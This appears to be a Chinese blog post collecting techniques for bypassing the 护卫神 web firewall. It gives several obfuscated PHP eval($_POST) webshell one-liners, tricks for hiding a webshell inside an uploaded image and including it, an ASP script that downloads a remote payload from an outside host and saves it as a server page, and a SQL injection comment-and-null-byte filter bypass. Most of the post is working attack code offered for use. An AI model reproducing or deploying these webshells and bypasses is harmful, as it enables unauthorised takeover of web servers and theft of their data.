过护卫神绕过方法总结

一、马儿篇,都是以前可以过护卫神的马
二、注入篇,可以绕过注入的方法
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿
一、马儿篇
—————-1号————————–

  1. <!--?php <br ?--> @eval
  2. ($_POST['1']);?&gt;

—————-2号————————–

  1. nono<!--?php <br ?--> eval
  2. ($_POST
  3. [1])
  4. ?&gt;

——————–3号————————

  1. <!--?php $a = str_replace(x,””,”axsxxsxexrxxt”);<br ?--> $a($_POST["c"]); ?&gt;
  2. 菜刀直接连,不需要构造连接字符串,密码 c

——————–类似于过安全狗的包含方法——————————————-

  1. A.asp版本:
  2. 将一句话保存为 XX.jpg 上传后 地址为 …/xxxxxx.jpg
  3. 在上传一个 x.asp 内容为 &lt;!–#include file=”../xxxxxx.jpg”–&gt;
  4. B.php版本
  5. 如果是php的话:
  6. <!--?php <br ?--> include “1.htm”;
  7. ?&gt;

——————实在不行,还可以下载——————————————————
远程下载马

  1. &lt;%
  2. Set xPost = CreateObject(“Microsoft.XMLHTTP”)
  3. xPost.Open “GET”,”http://www.xxx.com/123/1.txt”,False
  4. xPost.Send()
  5. Set sGet = CreateObject(“ADODB.Stream”)
  6. sGet.Mode = 3
  7. sGet.Type = 1
  8. sGet.Open()
  9. sGet.Write(xPost.responseBody)
  10. sGet.SaveToFile Server.MapPath(“ls.asp”),2
  11. set sGet = nothing
  12. set sPOST = nothing
  13. %&gt;

—————————————————————
二、注入篇

  1. /*%00*/截断符
  2. select/*%00*/* from admin;

—————————————————————
三、规则篇
可以利用类似:

  1. <!--?php <br ?--> $code=’一串base64′; //base64编码
  2. $x=str_replace(‘f’,””,”bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换
  3. $a = ‘/a/’;//正则规则
  4. preg_replace($a,’e’.’v’.’a’.’l’.’(‘.$x.’(‘.$code.’))’,’a’); //正则替换
  5. ?&gt;

方法绕过关键词过滤

一条评论

  1. 过护卫神绕过方法总结
    avatar
    Lv.1 1楼

    这个我喜欢

    发表评论

  1. 😉
  2. 😐
  3. 😡
  4. 😈
  5. 😯
  6. 😛
  7. 😳
  8. 😮
  9. 😆
  10. 💡
  11. 😀
  12. 👿
  13. 😥
  14. 😎
  15. 😕